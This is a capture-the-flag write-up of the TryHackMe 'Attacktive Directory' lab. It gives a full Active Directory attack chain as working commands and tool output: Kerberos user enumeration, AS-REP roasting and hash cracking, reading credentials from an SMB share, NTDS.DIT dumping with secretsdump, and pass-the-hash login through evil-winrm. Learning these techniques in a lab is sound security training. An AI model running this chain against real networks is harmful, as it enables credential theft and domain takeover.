Attacktive Directory
These notes are from a challenge I did @tryhackme called attacktivedirectory.
Prepare
Install Impacket, kerbrute, evil-winrm, Bloodhound and Neo4j:
sudo git clone <https://github.com/SecureAuthCorp/impacket.git> /opt/impacket
sudo pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/ && sudo python3 ./setup.py install
sudo apt install bloodhound neo4j
go get github.com/ropnop/kerbrute
gem install evil-winrm
sudo apt update && sudo apt upgrade
Scan
Scan target withnmap -sC -sV 10.10.12.33
Nmap output
``` txt Nmap scan report for 10.10.12.33 Host is up (0.021s latency). Not shown: 987 closed ports PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: | Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-08-19 19:17:25Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: THM-AD | NetBIOS_Domain_Name: THM-AD | NetBIOS_Computer_Name: ATTACKTIVEDIREC | DNS_Domain_Name: spookysec.local | DNS_Computer_Name: AttacktiveDirectory.spookysec.local | Product_Version: 10.0.17763 | System_Time: 2021-08-19T19:17:27+00:00 | ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local | Not valid before: 2021-08-18T18:37:51 |_Not valid after: 2022-02-17T18:37:51 |_ssl-date: 2021-08-19T19:17:35+00:00; 0s from scanner time. Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results: | smb2-security-mode: | 2.02: | Message signing enabled and required | smb2-time: | date: 2021-08-19T19:17:29 | start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.37 seconds ```
Enumerating Users via Kerberos
Enumerate port 139/445 withenum4linux -U -o 10.10.12.33
enum4linux output
``` txt Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Aug 19 15:24:22 2021
========================== | Target Information | ========================== Target ........... 10.10.12.33 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=================================================== | Enumerating Workgroup/Domain on 10.10.12.33 | =================================================== [E] Can't find workgroup/domain
==================================== | Session Check on 10.10.12.33 | ==================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437. [+] Server 10.10.12.33 allows sessions using username '', password '' Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451. [+] Got domain/workgroup name:
========================================== | Getting domain SID for 10.10.12.33 | ========================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359. Domain Name: THM-AD Domain Sid: S-1-5-21-3591857110-2884097990-301047963 [+] Host is part of a domain (not a workgroup)
===================================== | OS information on 10.10.12.33 | ===================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458. Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464. [+] Got OS info for 10.10.12.33 from smbclient: Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467. [+] Got OS info for 10.10.12.33 from srvinfo: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
============================ | Users on 10.10.12.33 | ============================ Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866. [E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881. [E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED enum4linux complete on Thu Aug 19 15:24:34 2021 ```
Abusing Kerberos
ASREPRoasting with kerbrute and the provided userlist: ./kerbrute -domain spookysec.local -dc-ip 10.10.12.33 -users ~/userlist.txt
kerbrute output
``` txt Impacket v0.9.24.dev1+20210814.5640.358fc7c6 - Copyright 2021 SecureAuth Corporation
[] Valid user => james [] Valid user => svc-admin [NOT PREAUTH] [] Valid user => James [] Valid user => robin [] Blocked/Disabled user => guest [] Valid user => darkstar [] Valid user => administrator [] Valid user => backup [] Valid user => paradox [] Valid user => JAMES [] Valid user => Robin [] Blocked/Disabled user => Guest [] Valid user => Administrator [] Valid user => Darkstar [] Valid user => Paradox [] Valid user => DARKSTAR [] Valid user => ori [] Valid user => ROBIN [] Blocked/Disabled user => GUEST [] No passwords were discovered :'( ```
GetNPUsers.py spookysec.local/svc-admin -no-pass -dc-ip 10.10.12.33
``` txt Impacket v0.9.24.dev1+20210814.5640.358fc7c6 - Copyright 2021 SecureAuth Corporation
[*] Getting TGT for svc-admin krb5asrep23svc-admin@SPOOKYSEC.LOCAL:fea34e6cdca777efe84cbdeaa48d35b9cf364f98148fce49cc67dd350754a9c9ccf20dd516b1c2c6aecb6984aba91fca5b386b4ba7b59434f54440ecccdd549533157318a55752abe941976eae78132f61832fba98bc391ee52c51e924cd8d091b6e6d854bc16e769184867024f195936687839c4e63cf54f7a2e1749020c279e3b08f78826ca90deffcda9bdd721a87166fa6e9fe6f68cd493751df05b2ae92a0e5e466f8c674bf16c346e9ee9714f7098369d90dad8e5bac5b4ac316e94ff65acd8914a356450be18b671db831031c6a709369d586d704bc827f2221f3edfd60e5f675fb6ac97570e20bd094362e354b63279e757486c82162d6ae04467d7c1261 ```
We recieved a Kerberos Ticket (Kerberos 5 AS-REP etype 23, mode 18200) which we can crack using hashcat and the provided passwordlist: hashcat -a 0 -m 18200 ~/example.hash ~/passwordlist.txt
hashcat output
``` txt hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
- Device #1: pthread-Intel(R) Xeon(R) Platinum 8171M CPU @ 2.60GHz, 13896/13960 MB (4096 MB allocatable), 4MCU
Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1
Applicable optimizers applied: * Zero-Byte * Not-Iterated * Single-Hash * Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected. Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance. If you want to switch to optimized backend kernels, append -O to your commandline. See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 134 MB
Dictionary cache built: * Filename..: /home/fab1/passwordlist.txt * Passwords.: 70188 * Bytes.....: 569236 * Keyspace..: 70188 * Runtime...: 0 secs
krb5asrep23svc-admin@SPOOKYSEC.LOCAL:fea34e6cdca777efe84cbdeaa48d35b9cf364f98148fce49cc67dd350754a9c9ccf20dd516b1c2c6aecb6984aba91fca5b386b4ba7b59434f54440ecccdd549533157318a55752abe941976eae78132f61832fba98bc391ee52c51e924cd8d091b6e6d854bc16e769184867024f195936687839c4e63cf54f7a2e1749020c279e3b08f78826ca90deffcda9bdd721a87166fa6e9fe6f68cd493751df05b2ae92a0e5e466f8c674bf16c346e9ee9714f7098369d90dad8e5bac5b4ac316e94ff65acd8914a356450be18b671db831031c6a709369d586d704bc827f2221f3edfd60e5f675fb6ac97570e20bd094362e354b63279e757486c82162d6ae04467d7c1261:management2005
Session..........: hashcat Status...........: Cracked Hash.Name........: Kerberos 5, etype 23, AS-REP Hash.Target......: krb5asrep23$svc-admin@SPOOKYSEC.LOCAL:fea34e6cdca...7c1261 Guess.Base.......: File (/home/fab1/passwordlist.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 158.0 kH/s (10.67ms) @ Accel:64 Loops:1 Thr:64 Vec:16 Recovered........: 1/1 (100.00%) Digests Progress.........: 16384/70188 (23.34%) Rejected.........: 0/16384 (0.00%) Restore.Point....: 0/70188 (0.00%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: m123456 -> cowgirlup
Started: 15:44:40 Stopped: 15:45:18 ```
Back to the Basics
Let's enumerate any shares that the domain controller may be giving out with smbclient: smbclient -L \\\\10.10.12.33 -U svc-admin@spookysec.local
smbclient user output
``` txt Enter svc-admin@spookysec.local's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available ```
Backup seems like an interesting share. Let's view it's content: smbclient \\\\10.10.12.33\\backup -U svc-admin@spookysec.local
smbclient backup output
``` txt Enter svc-admin@spookysec.local's password: Try "help" to get a list of possible commands. smb: > dir . D 0 Sat Apr 4 15:08:39 2020 .. D 0 Sat Apr 4 15:08:39 2020 backup_credentials.txt A 48 Sat Apr 4 15:08:53 2020
8247551 blocks of size 4096. 3636330 blocks available
smb: > more backup_credentials.txt ```
backup_credentials.txt contains some kind of hash which we can try to identify e.g. with decodify: dcode YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
dcode backup_credentials.txt
txt __ __ |/ | | / / | | ___ ___ ___ ___| ( | )|___)| | )| )| |___ \ ) |__/ |__ |__ |__/ |__/ | | \_/ / [+] Decoded from Base64 : backup@spookysec.local:backup2517860
Elevating Privileges within the Domain
Now that we know this is Base64 we can run this command to read the content: echo "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw" | base64 -d
Running secretsdump.py didn't work for me e.g.: secretsdump.py spookysec.local/backup:backup2517860@10.10.12.33 -use-vss
So i used metasploit with secretsdump.py und set lhost, SMBDomain, RHOSTS, SMBPass and SMBUser accordingly: msfconsole
metasplot with secretsdump.py
``` txt =[ metasploit v6.1.0-dev ] + -- --=[ 2157 exploits - 1146 auxiliary - 367 post ] + -- --=[ 596 payloads - 45 encoders - 10 nops ] + -- --=[ 8 evasion ]
Metasploit tip: View all productivity tips with the tips command
msf6 > search secretsdump
Matching Modules
# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/scanner/smb/impacket/secretsdump normal No DCOM Exec 1 post/windows/gather/credentials/windows_sam_hivenightmare 2021-07-20 normal No Windows SAM secrets leak - HiveNightmare 2 auxiliary/gather/windows_secrets_dump normal No Windows Secrets Dump
Interact with a module by name or index. For example info 2, use 2 or use auxiliary/gather/windows_secrets_dump
msf6 > use auxiliary/scanner/smb/impacket/secretsdump
msf6 auxiliary(scanner/smb/impacket/secretsdump) > set lhost 10.9.193.173 lhost => 10.9.193.173 msf6 auxiliary(scanner/smb/impacket/secretsdump) > set SMBDomain spookysec.local SMBDomain => spookysec.local msf6 auxiliary(scanner/smb/impacket/secretsdump) > set RHOSTS 10.10.12.33 RHOSTS => 10.10.12.33 msf6 auxiliary(scanner/smb/impacket/secretsdump) > set SMBPass backup2517860 SMBPass => backup2517860 msf6 auxiliary(scanner/smb/impacket/secretsdump) > set SMBUser backup SMBUser => backup msf6 auxiliary(scanner/smb/impacket/secretsdump) > exploit
[] Running for 10.10.12.33... [-] 10.10.12.33 - RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [] 10.10.12.33 - Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [] 10.10.12.33 - Using the DRSUAPI method to get NTDS.DIT secrets [+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc::: [+] Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [+] krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21::: [+] spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4::: [+] spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4::: [+] spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b::: [+] spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e::: [+] spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b::: [+] spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7::: [+] spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a::: [+] spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb::: [+] spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2::: [+] spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705::: [+] spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664::: [+] spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809::: [+] spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538::: [+] spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc::: [+] ATTACKTIVEDIREC:1000:aad3b435b51404eeaad3b435b51404ee:42d07e838f3742f5c120ff5709cf684c::: [*] 10.10.12.33 - Kerberos keys grabbed [+] Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48 [+] Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae [+] Administrator:des-cbc-md5:2079ce0e5df189ad [+] krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc [+] krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902 [+] krbtgt:des-cbc-md5:b94f97e97fabbf5d [+] spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04 [+] spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233 [+] spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f [+] spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5 [+] spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425 [+] spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064 [+] spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112 [+] spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6 [+] spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9 [+] spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe [+] spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510 [+] spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054 [+] spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd [+] spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e [+] spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594 [+] spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499 [+] spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be [+] spookysec.local\darkstar:des-cbc-md5:758af4d061381cea [+] spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067 [+] spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e [+] spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a [+] spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3 [+] spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8 [+] spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64 [+] spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0 [+] spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8 [+] spookysec.local\paradox:des-cbc-md5:83988983f8b34019 [+] spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347 [+] spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa [+] spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86 [+] spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166 [+] spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c [+] spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157 [+] spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518 [+] spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff [+] spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d [+] spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922 [+] spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197 [+] spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89 [+] spookysec.local\a-spooks:aes256-cts-hmac-sha1-96:cfd00f7ebd5ec38a5921a408834886f40a1f40cda656f38c93477fb4f6bd1242 [+] spookysec.local\a-spooks:aes128-cts-hmac-sha1-96:31d65c2f73fb142ddc60e0f3843e2f68 [+] spookysec.local\a-spooks:des-cbc-md5:e09e4683ef4a4ce9 [+] ATTACKTIVEDIREC:aes256-cts-hmac-sha1-96:4d608519152181fd16cfce52eba869dc3620ed788902a87b6f218f756c79c4ab [+] ATTACKTIVEDIREC:aes128-cts-hmac-sha1-96:872f3e7f6d4ecdd33af0d0b934161b92 [+] ATTACKTIVEDIREC:des-cbc-md5:9426b6febf6dc2ab [] 10.10.12.33 - Cleaning up... [] Scanned 1 of 1 hosts (100% complete) [] Auxiliary module execution completed ```
Secretsdump.py uses the DRSUAPI method to get NTDS.DIT secrets. We can feed evil-winrm with the hash of the adminstrator to gain access using this command: evil-winrm -i 10.10.12.33 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
evil-winrm output and flags
``` txt Evil-WinRM shell v3.2
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Evil-WinRM PS C:\Users\Administrator\Documents> Evil-WinRM PS C:\Users\Administrator\Desktop> more root.txt Evil-WinRM PS C:\Users\backup\Desktop> more PrivEsc.txt Evil-WinRM PS C:\Users\svc-admin\Desktop> more user.txt.txt ```
Whoop Whoop, now we have the flags for Administrator, backup and svc-admin ^^